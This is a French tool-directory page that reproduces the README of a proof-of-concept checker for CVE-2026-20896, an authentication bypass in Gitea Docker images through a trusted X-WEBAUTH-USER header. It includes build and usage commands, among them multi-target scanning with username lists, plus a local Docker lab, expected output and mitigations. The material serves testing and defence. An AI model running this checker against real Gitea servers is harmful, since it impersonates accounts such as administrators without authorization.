Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2026-20896-gitea-poc — CVE-2026-20896 Vérificateur de contournement d'authentification X-WEBAUTH-USER pour Gitea Docker | Kitploit
Outils/GitHubGitHub/szybnev/cve-2026-20896-gitea-poc
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubszybnev/cve-2026-20896-gitea-poc

cve-2026-20896-gitea-poc

CVE-2026-20896 Vérificateur de contournement d'authentification X-WEBAUTH-USER pour Gitea Docker

Voir le dépôt
101il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-20896 Gitea Docker Auth Bypass Checker

Opérations de red team / pentest autorisées uniquement.

Ce dépôt contient un vérificateur minimal pour CVE-2026-20896, un contournement d'authentification dans les images Docker officielles de Gitea jusqu'à la version 1.26.2 incluse lorsque l'authentification par proxy inverse est activée.

Qu'est-ce que CVE-2026-20896

Les images Docker Gitea concernées étaient livrées avec un modèle app.ini contenant :

root@kitploit:~
REVERSE_PROXY_TRUSTED_PROXIES = *

Lorsqu'un administrateur activait :

root@kitploit:~
ENABLE_REVERSE_PROXY_AUTHENTICATION = true

Gitea faisait confiance à l'en-tête X-WEBAUTH-USER provenant de toute adresse IP capable d'atteindre directement le port HTTP du conteneur. Un client contournant le proxy inverse d'authentification prévu pouvait envoyer un seul en-tête et usurper l'identité d'un utilisateur connu ou devinable.

L'impact pratique est l'usurpation de compte sans authentification. Si l'utilisateur deviné est un administrateur, le pire cas est une prise de contrôle totale au niveau de l'application de l'instance Gitea et de ses dépôts. L'exécution de code à distance sur l'hôte dépend de l'environnement et n'est pas revendiquée par ce vérificateur.

Les versions corrigées commencent à 1.26.3 ; il est recommandé de passer à 1.26.4 ou plus récent.

Comment fonctionne la preuve de concept

Le vérificateur :

  1. Récupère la page d'accueil de la cible.
  2. Recherche un texte de pied de page tel que Powered by Gitea Version: 1.26.4.
  3. Ignore le test par défaut si la version parsée est >= 1.26.3.
  4. Envoie des requêtes GET / avec X-WEBAUTH-USER: <username> pour chaque nom d'utilisateur fourni.
  5. Signale une correspondance lorsque le titre de la page renvoyée ressemble à un tableau de bord connecté pour cet utilisateur.

La version Go prend en charge plusieurs cibles, fichiers de noms d'utilisateurs, concurrence, délais d'attente, sortie JSONL, TLS --insecure, --dry-run et --force.

Compilation

root@kitploit:~
go build -o gitea-cve-2026-20896-check .

Aucune dépendance Go tierce n'est requise.

Utilisation

Cible unique :

root@kitploit:~
./gitea-cve-2026-20896-check \
  --url http://localhost:3000 \
  --users admin,gitea_admin,alice

Plusieurs cibles et noms d'utilisateurs :

root@kitploit:~
./gitea-cve-2026-20896-check \
  --targets targets.txt \
  --user-file users.txt \
  --concurrency 64 \
  --timeout 8s \
  --jsonl

Essai à blanc :

root@kitploit:~
./gitea-cve-2026-20896-check \
  --url http://localhost:3000 \
  --users admin,alice \
  --dry-run

Alternative Bash :

root@kitploit:~
./poc.sh --url http://localhost:3000 --users admin,alice

Codes de sortie

  • 0 : au moins une usurpation vulnérable a été confirmée
  • 1 : aucune usurpation vulnérable n'a été confirmée
  • 2 : erreur d'utilisation, d'entrée ou d'exécution

Laboratoire de reproduction local

Le laboratoire suivant démarre un conteneur Gitea local affecté et crée un utilisateur de test :

root@kitploit:~
docker run -d --name gitea-cve-2026-20896 \
  -p 127.0.0.1:3000:3000 \
  -e GITEA__service__ENABLE_REVERSE_PROXY_AUTHENTICATION=true \
  -e GITEA__security__INSTALL_LOCK=true \
  gitea/gitea:1.26.2

sleep 15

docker exec --user git gitea-cve-2026-20896 gitea admin user create \
  --username alice \
  --password 'longpasswordhere1234' \
  --email [email protected] \
  --must-change-password=false

./gitea-cve-2026-20896-check --url http://localhost:3000 --users bob,alice,admin

Résultat positif attendu :

root@kitploit:~
[VULNERABLE] http://localhost:3000 user=alice title="alice - Dashboard - Gitea: Git with a cup of tea"

Nettoyage :

root@kitploit:~
docker rm -f gitea-cve-2026-20896

Atténuation

  • Mettez à jour Gitea vers 1.26.3 ou plus récent ; 1.26.4 ou plus récent est préféré.
  • N'exposez pas le port HTTP du conteneur Gitea backend directement à des réseaux non fiables.
  • Configurez explicitement les proxies inverses de confiance.
  • Gardez l'authentification par proxy inverse désactivée sauf si le chemin réseau et la limite de confiance du proxy sont compris.

Références

  • Avis de sécurité Gitea : https://github.com/go-gitea/gitea/security/advisories/GHSA-f75j-4cw6-rmx4
  • Notes de version de Gitea pour 1.26.3 / 1.26.4 : https://blog.gitea.com/release-of-1.26.3-and-1.26.4/
  • Correctif PR : https://github.com/go-gitea/gitea/pull/38151
  • Fiche CVE : https://www.cve.org/CVERecord?id=CVE-2026-20896
  • Rapport de sondage réel via The Hacker News / télémétrie Sysdig : https://thehackernews.com/2026/07/threat-actors-probe-gitea-docker-flaw.html
Télécharger l’outil